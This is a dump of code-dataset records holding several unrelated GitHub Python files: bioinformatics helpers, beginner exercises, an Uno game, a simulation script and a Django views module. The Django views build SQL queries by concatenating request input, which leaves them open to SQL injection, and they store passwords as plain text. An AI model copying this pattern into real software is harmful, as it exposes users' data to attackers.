diff_vector))\n\ndef count_residues(model):\n \"\"\"\n Returns the number of residues contained by the given model by determining\n the length of the generator returned by Model.get_residues().\n \"\"\"\n return sum(1 for e in model.get_residues())\n\ndef fetch_pdb(pdbid, filename):\n \"\"\"\n Attemps to fetch from rcsb.org a pdb file representing the protein with the\n given ID. If successful, saves the pdb to a temp file and returns the\n filename.\n \"\"\"\n pdb_url = \"https://www.rcsb.org/pdb/files/%s.pdb\" % pdbid.lower()\n urllib.urlretrieve(pdb_url, filename=filename)\n\ndef get_structure(pdbfile):\n \"\"\"\n For convenience - returns a Bio.PDB.Structure object constructed from the\n given pdb file.\n \"\"\"\n root, ext = os.path.splitext(pdbfile)\n if ext.lower() != \".pdb\":\n raise ValueError(\"Given file is not a .pdb file.\")\n return Bio.PDB.PDBParser().get_structure(root, pdbfile)\n\ndef remove_hetero(model):\n \"\"\"\n Removes all heterogeneous residues from a model. Use this if your\n calculations should only be considered with the actual protein residues.\n \"\"\"\n for chain in model:\n hetero_list = []\n for residue in chain:\n id = residue.get_id()\n if id[0] != \" \":\n hetero_list.append(id)\n for id in hetero_list:\n chain.detach_child(id)\n\ndef residue_array(model):\n \"\"\"\n Creates a numpy array containing all residues in the given model.\n Arrays can be convenient as opposed to the generator returned by \n Model.get_residues()\n \"\"\"\n a = numpy.zeros(count_residues(model), numpy.object)\n for i, res in enumerate(model.get_residues()): a[i] = res\n return a\n\ndef check_url(url):\n \"\"\"\n Check if the given url is accessible. Returns nothing if accessible,\n raise exception if not. Use signals to implement timeout because\n timeout argument of HTTPConnection does not exist in Python 2.5.2\n \"\"\"\n def handler(signum, frame):\n raise Exception(\"%s: Timeout\" % url)\n signal.signal(signal.SIGALRM, handler)\n signal.alarm(10)\n conn = httplib.HTTPConnection(url)\n conn.request(\"HEAD\", \"/\")\n res = conn.getresponse()\n signal.alarm(0)\n if res.status != 200:\n raise Exception(\"%s: Status %d returned.\" % (url, res.status))\n\n","repo_name":"GeorgeIniatis/AlphaFold_Dataset_Drug_Binding_Prediction","sub_path":"contactmaps/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31386463186","text":"# Author : Parishkar Singh Python 3.10 2022\n# ...............................................................\n# Converting Number to words\n# ...............................................................\nimport inflect\n\n\ndef convertOnes():\n # given input 0 1 2 3 4 5 6 7 8 9\n string = ','+inflect.engine().number_to_words(123456789, group=1)\n return string.split(',')\n\n\ndef convertTwos():\n # given input 10 11 12 13 14 15 16 17 18 19\n string = inflect.engine().number_to_words(10111213141516171819, group=2)\n # output ten, eleven, tweleve, thirteen, fourteen, fifteen, sixteen, seventeen, eighteen, nineteen\n return string.split(',')\n\n\ndef convertTens():\n # given input 20 30 40 50 60 70 80 90\n string = ','+' ,'+inflect.engine().number_to_words(2030405060708090, group=2)\n # output twenty, thirty, forty, fifty, sixty, seventy, eighty, ninety\n return string.split(',')\n\n\ndef convertHundreds():\n string = \"\"\n for i in range(1, 10):\n string = string+inflect.engine().number_to_words(i, group=1)+\" hundred,\"\n string = string[:len(string)-1:]\n # output one to nine hundred\n return string.split('-')\n\n\ndef sigificantPlaceValue():\n return{3: 'thousand', 6: 'million', 9: 'billion'}\n\n\ndef printlist(a):\n for i in range(0, len(a)):\n print(a[i], end=\" \")\n\n\n# global list of words .............................................................................\nones = convertOnes() # contains a list of zero-nine\ntwos = convertTwos() # contains a list of ten-twenty words\ntens = convertTens() # contains a list of twenty-hundred\nX = ones+twos\nY = tens\nhundreds = convertHundreds()\n# suffix contains list of bigger values like thousand, million and billion\nsuffixs = sigificantPlaceValue()\n# combined dictionary contains reference to all the words\ncombined = {0: ones, 1: twos, 2: tens, 3: suffixs, }\n# ..................................................................................................\n\n\ndef convertToDigit(n, suffix):\n if n == 0:\n return EMPTY\n\n # split `n` if it is more than 19\n if n > 19:\n return Y[n // 10] + X[n % 10] + suffix\n else:\n return X[n] + suffix\n\n\ndef convertToWords(n):\n # add digits at ten million and hundred million place\n result = convertToDigit((n // 1000000000) % 100, 'Billion, ')\n # add digits at the million mark\n result = convertToDigit((n // 1000000) % 100, ' million, ')\n # add digits at thousand and tens thousand place\n result += convertToDigit(((n // 1000) % 100), ' thousand, ')\n # add digit at hundred place\n result += convertToDigit(((n // 100) % 10), ' hundred ')\n\n if n > 100 and n % 100:\n result += 'and '\n\n # add digits at ones and tens place\n result += convertToDigit((n % 100), '')\n\n return result.strip().rstrip(',').replace(', and', ' and')\n\n\nif __name__ == '__main__':\n EMPTY = ''\n # print(convertToWords(10))\n # print(combined[1][4])\n # print(ones)\n # print(twos)\n # print(tens)\n # print(hundreds)\n print(convertToWords(32))\n # print(combined[0][4])\n # printlist(suffixs)\n # a = convertOnes()\n # printlist(two)\n","repo_name":"parishkar-9790/Python","sub_path":"src/py47advancenumbertoword.py","file_name":"py47advancenumbertoword.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7378557414","text":"#if statements problem-----------------------------------------------\nbench = int(input(\"How much can you bench?: \"))\n\nif bench <10:\n print(\"Keep practicing and you'll eventually get better\")\nelif bench > 10 and bench < 50:\n print(\"You're getting good at this\")\nelif bench > 50:\n print(\"You're swol\")\n\n\n#for loop problem-----------------------------------------------\nfor i in range(20, 52, 2):\n print(i, end = \" \")\n\n#while loop problem-----------------------------------------------\nword = \"ribbit\"\n\nwhile word != \"frog\":\n print(\"Ribbit\")\n word = input(\"type anything you want but type frog to quit: \")\n\nprint(\"You typed frog\")\n\n#while loop problem-----------------------------------------------\nnum = 100\nwhile num >= 50:\n print(num, end = \" \")\n num-=5\n\n#function problem-----------------------------------------------\ndef AvgTwoNums(x, y):\n \n add = (x + y) / 2\n\n return add\n\nprint(\"The average number is\", AvgTwoNums(8,4))\n\n\n\n\nmarbles = [4, 6, 2, 9]\n\nprint(\"The second element is\", marbles[1])\nfor i in range(len(marbles)):\n marbles[i] *= 5\n print(marbles)\n\n#class problem-----------------------------------------------\nclass fruit():\n def __init__(self, type, weight):\n self.type = type\n self.weight = weight\n self.isFresh = True\n\n def printInfo(self):\n print(\"The fruit type is \", self.type, \", the weight is\", self.weight, \"and their freshness status is\", self.isFresh)\n\n def turnRotten(self):\n self.isFresh = False\n\n\n\nfruit1 = fruit(\"Watermelon\",10.0)\nfruit2 = fruit(\"Strawberry\",1.0)\n\nwhile True:\n choice = int(input(\"press 1 to turn the Watermelon rotten, and 2 to turn the Strawberry rotten or 3 to check their info: \"))\n\n if choice == 1:\n fruit1.turnRotten()\n print(\"The watermelon is rotten\")\n elif choice == 2:\n fruit2.turnRotten()\n print(\"The strawberry is rotten\")\n elif choice == 3:\n fruit1.printInfo()\n fruit2.printInfo()\n\n\n\n","repo_name":"ArthurTheAardvar/Python-Review","sub_path":"Python Review/Python_Review.py","file_name":"Python_Review.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73609178613","text":"from tkinter import filedialog\nimport tkinter\nimport sys\nfrom PIL import Image\nimport math\nimport resize as re\n\nfrom os import listdir\nfrom os.path import isfile, join\n\n# if(len(sys.argv) == 1):\nprint('''설명서 : \n1배수 이미지크기를 확인하고 2배수 이미지의 크기를 조정해 드립니다.\n인자로 png 이미지가 있는 경로를 추가해주세요.\n# 배경이 투명인 경우만 가능합니다.\n''')\n# \tsys.exit()\n\n\nroot = tkinter.Tk()\nroot.withdraw()\nmypath = filedialog.askdirectory(parent=root, initialdir=\"./\", title='Please select a directory')\nprint(\"\\ndir_path : \", mypath)\n\n# mypath = sys.argv[1]\n# print('입력받은 경로 : ' + mypath)\nonlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\n\nfor item in onlyfiles:\n if (item.find('@2x') > 0):\n loadfilename = item.replace('@2x', '')\n old_image_path = mypath+'\\\\'+loadfilename\n im = Image.open(old_image_path)\n old_width, old_height = im.size\n # print(loadfilename)\n old_width = old_width * 2\n old_height = old_height * 2\n citem = mypath+'\\\\'+item\n print(loadfilename , ' width:',old_width,' height:',old_height)\n re.resize_canvas(citem, citem, old_width, old_height)\n # filename, new_image_path=\"save.png\", canvas_width=500, canvas_height=500\n","repo_name":"kangTaehee/python","sub_path":"filelist-folderselect.py","file_name":"filelist-folderselect.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20898672355","text":"from __future__ import print_function\nimport os\nimport tempfile\nimport copy\n\nimport numpy as np\n\nfrom pdbparser import pdbparser\nfrom pdbparser.log import Logger\nfrom pdbparser.Utilities.Database import __ATOM__\nfrom pdbparser.Utilities.Collection import get_path\nfrom pdbparser.Utilities.Simulate import Simulation\n\nat1 = copy.deepcopy(__ATOM__)\nat2 = copy.deepcopy(__ATOM__)\nat1['atom_name'] = \"h1\"\nat2['atom_name'] = \"h2\"\nat1['residue_name'] = \"h2\"\nat2['residue_name'] = \"h2\"\nat1['element_symbol'] = \"h\"\nat2['element_symbol'] = \"h\"\nat1['coordinates_x'] = -0.125\nat2['coordinates_x'] = 0.125\n\n# import molecule\npdb1 = pdbparser()\npdb1.records = [at1, at2]\n\n# create simulation\nsim = Simulation(pdb1, logStatus = False, logExport = False,\n stepTime = 0.2, numberOfSteps = 10, outputFrequency = 1,\n exportInitialConfiguration = True, outputPath = tempfile.mktemp(\".xyz\"))\n# remove all bonded interactions\nsim.bonds_indexes = []\nsim.angles_indexes = []\nsim.dihedrals_indexes = []\nsim.nBondsThreshold = [[],[]]\n# setting charges to 0\nsim.atomsCharge = [0,0]\n\n# initial parameters\nLogger.info(\"minimizing %s steps at %s fm per step, with atoms charge %s, VDW forces push atoms to equilibrium distance %s\" % (sim.numberOfSteps, sim.timeStep, sim.atomsCharge, 2*sim.__LJ__['h']['rmin/2']) )\nsim.minimize_steepest_descent()\n\n# add charges and change stepTime\nsim.atomsCharge = [0.15,0.15]\nsim.stepTime = 0.02\nsim.exportInitialConfiguration = False\n\n# re-minimize parameters\nLogger.info(\"minimizing %s steps at %s fm per step, with atoms charge %s, VDW forces push atoms to equilibrium distance %s\" % (sim.numberOfSteps, sim.timeStep, sim.atomsCharge, 2*sim.__LJ__['h']['rmin/2']) )\nsim.minimize_steepest_descent()\n\n# add charges and change stepTime\nsim.atomsCharge = [-0.15,0.15]\n#\n# # re-minimize parameters\nLogger.info(\"minimizing %s steps at %s fm per step, with atoms charge %s, VDW forces push atoms to equilibrium distance %s\" % (sim.numberOfSteps, sim.timeStep, sim.atomsCharge, 2*sim.__LJ__['h']['rmin/2']) )\nsim.minimize_steepest_descent()\n\n# add charges and change stepTime\nsim.atomsCharge = [-0.15,-0.15]\n\n# re-minimize parameters\nLogger.info(\"minimizing %s steps at %s fm per step, with atoms charge %s, VDW forces push atoms to equilibrium distance %s\" % (sim.numberOfSteps, sim.timeStep, sim.atomsCharge, 2*sim.__LJ__['h']['rmin/2']) )\nsim.minimize_steepest_descent()\n\n# add charges and change stepTime\nsim.atomsCharge = [0.15,-0.15]\n\n# re-minimize parameters\nLogger.info(\"minimizing %s steps at %s fm per step, with atoms charge %s, VDW forces push atoms to equilibrium distance %s\" % (sim.numberOfSteps, sim.timeStep, sim.atomsCharge, 2*sim.__LJ__['h']['rmin/2']) )\nsim.minimize_steepest_descent()\n\n# minimze molecule\nsim.visualize_trajectory(sim.outputPath)\n","repo_name":"bachiraoun/pdbparser","sub_path":"Examples/simulationNonBonded.py","file_name":"simulationNonBonded.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"35485673393","text":"import matplotlib.animation as animation\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfig=plt.figure()\nax = fig.add_subplot(111, autoscale_on=False, xlim=(0, 2*np.pi), ylim=(-2, 2))\nline, = ax.plot([],[])\ntime_template = 'time = %.1fs'\ntime_text = ax.text(0.05, 0.9, '', transform=ax.transAxes)\ndef init():\n line.set_data([], [])\n time_text.set_text('')\n return line, time_text\n\ndef animate(t):\n #currentx=X\n #currenty=Y[t,:]\n\n\n line.set_data(X,Y[t,:])\n time_text.set_text(time_template % t)\n return line,time_text\n\n\n\nani=animation.FuncAnimation(fig,animate,frames=100,interval=20,init_func=init,blit=True)\nplt.show()\n","repo_name":"TomMCallingham/SpaggetiAstro","sub_path":"Masters/ComponentSpaceAnalysis/AnimateTimeEvol.py","file_name":"AnimateTimeEvol.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4677334823","text":"from django.shortcuts import render\nfrom .models import Imagini, LocatiiAutocar, PretAutocar\nfrom .serializers import ImageSerializer, PretAutocarSerializer, ConditiiSerializer, MasaSerializer, UpdateSerializer, DeleteOrderSerializer, RatingBorderSerializer\nfrom rest_framework import viewsets\nfrom rest_framework import generics\nfrom rest_framework.response import Response\nfrom django.db import connection\nfrom travel_app.utils.jwt_token import decode_token\n\n\nclass ImageListView(generics.ListAPIView):\n serializer_class = ImageSerializer\n\n def get_queryset(self):\n queryset = Imagini.objects.raw('SELECT * FROM imagini')\n return queryset\n\n\nclass RatingBorderView(generics.GenericAPIView):\n serializer_class = RatingBorderSerializer\n\n def post(self, request):\n cursor = connection.cursor()\n cursor.execute(\n 'select oras avg(nota) from image_rating where avg(nota) in (select top 1 avg(nota) from image_rating group by oras)')\n return Response({\n 'success'\n })\n\n\nclass ConditiiView(generics.GenericAPIView):\n serializer_class = ConditiiSerializer\n\n def post(self, request):\n cursor = connection.cursor()\n cursor.execute('select count(*) from ' + request.data['tip_transport'] + ' where id_' +\n request.data['tip_transport'] + ' = (select distinct id_' + request.data['tip_transport'] + ' from locatii_' + request.data['tip_transport'] + ' where oras=' + request.data['oras'] + ')')\n isValid = cursor.fetchone()\n\n return Response({\n 'isValid': isValid\n })\n\n\nclass DeleteView(generics.GenericAPIView):\n serializer_class = DeleteOrderSerializer\n\n def post(self, request):\n cursor = connection.cursor()\n obj = decode_token(request.data['token'])\n cursor.execute(\n 'delete from rezervare_tot where nume=(select nume_utilizator from utilizator u where u.username=\\'' + obj['username'] + '\\')')\n\n return Response({\n 'obj': obj\n })\n\n\nclass UpdateView(generics.GenericAPIView):\n serializer_class = UpdateSerializer\n\n def post(self, request):\n cursor = connection.cursor()\n obj = decode_token(request.data['token'])\n cursor.execute(\n 'update utilizator set password=' +\n request.data['password'] +\n ' where username=\\'' + obj['username'] + \"'\"\n )\n\n return Response({\n 'obj': obj\n })\n\n\nclass MasaView(generics.GenericAPIView):\n serializer_class = MasaSerializer\n\n def post(self, request):\n cursor = connection.cursor()\n cursor.execute(\n 'select id_' + request.data['tip_transport'] + ' from locatii_' + request.data['tip_transport'] +\n ' inner join orase on locatii_' + request.data['tip_transport'] + '.oras = orase.id_oras where nume_oras=' +\n request.data['oras']\n )\n transport = cursor.fetchone()\n\n cursor.execute(\n 'select id_masa from masa where nume_masa=' + request.data['masa']\n )\n masa = cursor.fetchone()\n\n return Response({\n 'id_transport': transport,\n 'masa': masa\n })\n\n\nclass PretAutocarView(generics.GenericAPIView):\n serializer_class = PretAutocarSerializer\n\n def post(self, request):\n cursor = connection.cursor()\n cursor.execute(\n 'select pret_autocar from locatii_autocar inner join orase on locatii_autocar.oras = orase.id_oras where nume_oras=' + request.data['oras'])\n pret_autocar = cursor.fetchone()\n cursor.execute(\n 'select pret_zbor from locatii_zbor inner join orase on locatii_zbor.oras = orase.id_oras where nume_oras=' + request.data['oras'])\n pret_zbor = cursor.fetchone()\n cursor.execute(\n 'select pret_masa from masa where nume_masa=' +\n request.data['masa']\n )\n pret_masa = cursor.fetchone()\n cursor.execute(\n 'select procent_discount from discount inner join utilizator on discount.nume_discount=utilizator.status where status=' +\n request.data['statut']\n )\n discount = cursor.fetchone()\n cursor.execute(\n 'select id_' + request.data['tip_transport'] + ' from locatii_' + request.data['tip_transport'] +\n ' inner join orase on locatii_' + request.data['tip_transport'] + '.oras = orase.id_oras where nume_oras=' +\n request.data['oras']\n )\n transport = cursor.fetchone()\n\n return Response(\n {\n 'pret_autocar': pret_autocar,\n 'pret_zbor': pret_zbor,\n 'pret_masa': pret_masa,\n 'discount': discount,\n 'id_transport': transport\n }\n )\n","repo_name":"stoiica/react","sub_path":"utils/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70809098294","text":"\"\"\"\nA Uno game implementation\n\"\"\"\nimport random\n\n\nclass Card:\n \"\"\"\n This creates a set of 112 cards in total: cards ranged from 0 to 9 for Blue, Green,\n Red and Yellow each (20 cards per color)\n 8 Draw Two cards, 8 Reverse cards and 8 Skip cards with two cards per color each\n 4 Wild cards and 4 Wild Draw Four cards.\n\n Attributes:\n rank: an integer representing the number on the card\n \"\"\"\n\n def __init__(self, clr, rank):\n \"\"\"\n Args:\n suit: A string representing the suit.\n rank: An int representing the rank of the card (10-14 is Draw Two, Reverse, Skip\n and Wild Draw).\n \"\"\"\n self.clr = clr\n self.rank = rank\n\n def __repr__(self):\n \"\"\"\n Define the rank of special cards (including Draw Two, Reverse, Skip, Wild and\\\n Wild Draw Four cards) in the card list\n\n Return:\n a list? that represents the information of a card's color and number\n \"\"\"\n # Draw Two = 10, Reverse=11, Skip=12, Wild Card = 13, Wild Draw Four = 14\n if self.rank == 10:\n rank = \"Draw Two\"\n elif self.rank == 11:\n rank = \"Reverse\"\n elif self.rank == 12:\n rank = \"Skip\"\n elif self.rank == 13:\n rank = \"Card\"\n elif self.rank == 14:\n rank = \"Draw Four\"\n else:\n rank = self.rank\n\n return f\"{self.clr} {rank}\"\n\n\nclass Deck:\n \"\"\"\n This defines and records the cards in the deck that players are going to draw from.\n When cards in the deck are run out, the discarded cards are reshuffled and made into a new deck.\n\n Attributes:\n number_of_cards: an integer representing the total number of cards left in the deck\n drawn_cards: a list containing the cards drawn to players from the deck\n pos: a number which represents the position of the card in the deck\n possible_card: a method defined in the previous class which represents the cards that might \\\n appear in the deck\n invalid_colors: a list containing the colors that are not valid and should be discarded if \\\n appearing to be the first of the deck\n invalid_numbers: a list containing the numbers that are not valid and should be discarded if \\\n appearing to be the first of the deck\n new_middle: a list representing the cards in the reshuffled deck\n middle_card: a list containing cards in the deck\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Store initial values to arguments\n \"\"\"\n self.cards = []\n self.middle = []\n for clr in [\"Red\", \"Blue\", \"Green\", \"Yellow\"]:\n for rank in range(0, 13):\n self.cards.append(Card(clr, rank))\n if rank != 0:\n self.cards.append(Card(clr, rank))\n for _ in range(0, 4):\n self.cards.append(Card(\"Wild\", 13))\n self.cards.append(Card(\"Wild\", 13))\n self.cards.append(Card(\"Wild\", 14))\n\n def shuffle(self):\n \"\"\"\n Shuffle all the cards in cards for a random order.\n \"\"\"\n random.shuffle(self.cards)\n\n def draw(self, number_of_cards):\n \"\"\"\n Allow players to draw cards from the deck to their hands\n\n Args:\n number_of_cards: a int representing the number of cards to draw from the deck\n Returns:\n a list of the drawn cards pulled from the deck\n \"\"\"\n if number_of_cards > len(self.cards):\n self.reshuffle()\n drawn_cards = self.cards[0:number_of_cards]\n self.cards = self.cards[number_of_cards:]\n return drawn_cards\n\n def game_start(self):\n \"\"\"\n The middle card is set, the middle card is checked to not be a action card.\n \"\"\"\n pos = 0\n possible_card = self.cards[0]\n invalid_colors = [\"Wild\"]\n invalid_nums = [\"Draw Four\", \"Card\", \"Reverse\", \"Skip\", \"Draw Two\"]\n if str(possible_card).split()[0] not in invalid_colors and\\\n str(possible_card).split()[1] not in invalid_nums:\n self.middle = self.draw(1)\n print(f\"This is the card in the middle {self.middle[0]}\")\n return\n while str(possible_card).split()[0] in invalid_colors or\\\n str(possible_card).split()[1] in invalid_nums:\n pos += 1\n possible_card = self.cards[pos]\n self.middle = [possible_card]\n self.cards = self.cards[0:pos]+self.cards[pos+1::]\n\n print(f\"This is the card in the middle {self.middle[0]}\")\n\n def reshuffle(self):\n \"\"\"\n Shuffle the discarded cards to make a new deck\n \"\"\"\n new_middle = [self.middle[0]]\n self.cards = self.middle[1::] + self.cards\n self.shuffle()\n self.middle = new_middle\n\n def check_match(self, card):\n \"\"\"\n Check that the discarded card from the player's hand matches the top card on the deck\n\n Args:\n card: a card to checked against the middle card to make sure it is a match\n Returns:\n a boolean true if it a match, false if not a match\n \"\"\"\n middle_card = self.middle[0]\n if middle_card.clr == card.clr or card.clr == \"Wild\":\n return True\n if middle_card.rank == card.rank:\n return True\n return False\n\n def check_action(self, card):\n \"\"\"\n Check that the card is an action card\n\n Args:\n card: a card to check if it is a action card\n Returns\n a boolean, true if the card is an action, false otherwise\n \"\"\"\n if card.rank in range(10, 15):\n return True\n return False\n\n\nclass Player:\n \"\"\"\n This defines and records the cards in players' hands.\n\n Attributes:\n _deck: a list representing cards from the deck\n _hand: a list representing cards in a player's hand\n\n \"\"\"\n\n def __init__(self, deck, name):\n \"\"\"\n Store initial values to arguments\n\n Args:\n Deck: a deck object that the player is connected to\n name: a string representing the player's name\n \"\"\"\n self._deck = deck\n self._hand = self._deck.draw(7)\n self._name = name\n\n @property\n def deck(self):\n \"\"\"\n Access the private variable _deck\n\n Returns:\n the list contained in _deck\n \"\"\"\n return self._deck\n\n @property\n def hand(self):\n \"\"\"\n Access the private variable _hand\n\n Returns:\n the list contained in _hand\n \"\"\"\n return self._hand\n\n @property\n def name(self):\n \"\"\"\n Access the private variable _name\n\n Returns:\n the string contained in _name\n \"\"\"\n return self._name\n\n def display_name(self):\n \"\"\"\n Display player's name.\n\n Return:\n a string representing the player's name\n \"\"\"\n return self.name\n\n def play_card(self, card):\n \"\"\"\n Allow the player to discard a card from their hands doing multiple checks\n if the card is a match to the middle and it is actually in your hand\n\n Args:\n card: a card representing the card the player wants to play\n Returns:\n a boolean representing if the move was successful or not\n \"\"\"\n try:\n if len(self.hand) == 0:\n raise IndexError\n if card not in self.hand:\n raise ValueError\n if not self.deck.check_match(card):\n raise ValueError\n pos = self.hand.index(card)\n if pos < len(self.hand) - 1:\n self._hand = self.hand[0:pos] + self.hand[pos+1::]\n else:\n self._hand = self.hand[0:pos]\n\n self.deck.middle = [card] + self.deck.middle\n return True\n except (ValueError, IndexError):\n print(f\"This is not valid move, your hand is {self.hand}\")\n print(f\"The Card in the middle is: {self.deck.middle[0]}\")\n return False\n\n def draw(self, number_of_cards):\n \"\"\"\n Allows the player to draw card/cards from the deck\n\n Args:\n number_of_cards: a int representing the number of cards to draw from the deck\n \"\"\"\n self._hand += self._deck.draw(number_of_cards)\n\n def check_empty(self):\n \"\"\"\n Check if the player has no card left in the hand\n\n Returns:\n a boolean, true if the hand is empty false otherwise\n \"\"\"\n if len(self._hand) == 0:\n return True\n return False\n\n def __repr__(self):\n \"\"\"\n A string representation of player\n\n Returns:\n a string to represent the player\n \"\"\"\n string = \"\"\n for count in range(0, len(self._hand)):\n string = string + f\"Card {count+1}: {self._hand[count]}\\n\"\n return string\n\n\nclass PlayGame:\n \"\"\"\n iterate through the game\n\n Attributes:\n player_list: a list representing all the players in the game in sequence\n player_1: a list containing the deck of cards on the first player's hand\n player_2: a list containing the deck of cards on the second player's hand\n player_3: a list containing the deck of cards on the third player's hand\n player_4: a list containing the deck of cards on the fourth player's hand\n direction: an int representing which direction the list is being cycled through\n current_player: a integer referring to the order of the current player\n next_turn: an integer which decides the next player after current player's turn\n color_chosen: an input argument which allows the player to enter the next color they want to \\\n play after discarding a wild card\n valid_colors: a list containing the colors that are valid might appear in the set of cards\n card_pos: an input argument which allows the player to enter the position of the card they \\\n want to play/discard from the hand\n \"\"\"\n\n player_list = []\n\n def __init__(self, deck, player_names):\n \"\"\"\n Store initial values of arguments\n\n Deck: a deck object that the game is connected to\n name: a list representing the players' names\n \"\"\"\n self.deck = deck\n self.deck.shuffle()\n player_1 = Player(deck, str(player_names[0]))\n player_2 = Player(deck, str(player_names[1]))\n player_3 = Player(deck, str(player_names[2]))\n player_4 = Player(deck, str(player_names[3]))\n self.player_list = [player_1,\n player_2,\n player_3,\n player_4]\n self.direction = 1\n self.current_player = 0\n\n def next_player(self):\n \"\"\"\n Allow the next player in the turn to play game\n\n Returns:\n a int representing the next player position in the player list\n \"\"\"\n next_turn = self.current_player+1*self.direction\n if next_turn == -1:\n next_turn = 3\n elif next_turn == 4:\n next_turn = 0\n return next_turn\n\n def draw_card_played(self, number_of_cards):\n \"\"\"\n Updates the game state after a draw card is played, gives cards to next player\n and skips next player\n\n Args:\n number_of_cards: a int representing the number of cards to draw\n \"\"\"\n self.player_list[self.next_player()].draw(number_of_cards)\n self.skip_card_played()\n\n def reverse_card_played(self):\n \"\"\"\n Reverse the direction of the game when a reverse card is played\n \"\"\"\n self.direction = self.direction*-1\n\n def wild_card_played(self):\n \"\"\"\n Updates the middle card when a wild card is played which asks for user input\n to choose the color of the middle card\n \"\"\"\n color_chosen = input(\n \"Choose one of the colors, type as seen: Red/Green/Blue/Yellow: \")\n valid_colors = [\"Red\", \"Green\", \"Blue\", \"Yellow\"]\n if color_chosen in valid_colors:\n self.deck.middle[0].clr = color_chosen\n else:\n print(\"That is not a valid input please follow the correct format: \\\"Red\\\"\")\n\n def check_for_matches(self, player):\n \"\"\"\n Check if the card in the player's hand matches the card in the middle of the deck\n if the player does not have any matching cards it adds cards to hand until a match is found\n\n Args:\n player: a player representing the player to check their hand for matches\n Returns:\n return true once a match is found otherwise it recursively looks for a match\n \"\"\"\n for card in player.hand:\n if self.deck.check_match(card):\n return True\n player.draw(1)\n print(\"You had no matches so you take from the deck, here is your new hand\")\n print(player.hand)\n return self.check_for_matches(player)\n\n def skip_card_played(self):\n \"\"\"\n Updates the game state to skip the next player once a skip card is played\n \"\"\"\n self.current_player = self.next_player()\n\n def check_win(self):\n \"\"\"\n Check if any player has run out off all the cards in the hand\n\n Returns:\n a boolean returning true if a player has zero cards otherwise returns false\n \"\"\"\n for player in self.player_list:\n if len(player.hand) == 0:\n return True\n return False\n\n def player_turn(self, player, card_pos):\n \"\"\"\n Updates the game state for a player turn and make sure valid input is given\n\n Args:\n player: a player representing the player whose turn it is currently\n card_pos: a int representing the position of the card in the player hand that the\n player wishes to the player\n \"\"\"\n try:\n card_pos = int(card_pos) - 1\n if card_pos > len(player.hand)-1:\n raise IndexError\n if not player.play_card(player.hand[card_pos]):\n raise ValueError\n if self.deck.check_action(self.deck.middle[0]):\n action = self.deck.middle[0].rank\n if action == 10:\n self.draw_card_played(2)\n elif action == 11:\n self.reverse_card_played()\n elif action == 12:\n self.skip_card_played()\n elif action == 13:\n self.wild_card_played()\n elif action == 14:\n self.wild_card_played()\n self.draw_card_played(4)\n except (IndexError, ValueError):\n print(\"ERROR\")\n self.current_player = self.current_player - 1*self.direction\n\n def play(self):\n \"\"\"\n Runs and update the game state of uno for one complete turn\n \"\"\"\n uno_declare = \"\"\n print(f\"It is {self.player_list[self.current_player].name}'s Turn\")\n self.check_for_matches(self.player_list[self.current_player])\n print(f\"This is your hand:\\n{self.player_list[self.current_player]}\")\n card_pos = input(\n f\"{self.player_list[self.current_player].name} which card do you want to \" +\n \"play type 1 or 2 or ...: \")\n self.player_turn(self.player_list[self.current_player], card_pos)\n print(\"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\")\n print(\"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\")\n uno_declare = input(\"Hit enter once you are finished with your turn \")\n if len(self.player_list[self.current_player].hand) == 1 and uno_declare != \"Uno!\":\n self.player_list[self.current_player].draw(2)\n print(\"You forgot to say Uno :( you have to draw two cards\")\n elif len(self.player_list[self.current_player].hand) == 1 and uno_declare == \"Uno\":\n print(\"Uno!\")\n self.current_player = self.next_player()\n input(\n f\"Hit Enter once {self.player_list[self.current_player].name} is at the computer\")\n print(\n f\"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\nThis is the card in the middle: {self.deck.middle[0]}\")\n\n def win_message(self, player):\n \"\"\"\n Print out the winning message according to the player\n\n Args:\n player: a player representing the player which has won\n \"\"\"\n print(f\"Congrats {player.name}! You have won! Please continue\" +\n \"to rub it in your opponents face now\")\n","repo_name":"olincollege/uno-card-game","sub_path":"uno_deck.py","file_name":"uno_deck.py","file_ext":"py","file_size_in_byte":16640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10954815667","text":"# Definition for singly-linked list.\nfrom typing import Optional\n\n\nclass ListNode:\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.next = None\n\nclass Solution:\n\tdef detectCycle(self, head: Optional[ListNode]) -> Optional[ListNode]:\n\t\t\n\t\tvisitedNodes = dict()\n\t\t\n\t\twhile head:\n\t\t\tif id(head) in visitedNodes:\n\t\t\t\treturn head\n\t\t\t\n\t\t\tvisitedNodes[id(head)] = head \n\t\t\thead = head.next\n\t\t\t\n\t\treturn None\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t","repo_name":"A7fa7fa/python-leetcode","sub_path":"0142 - 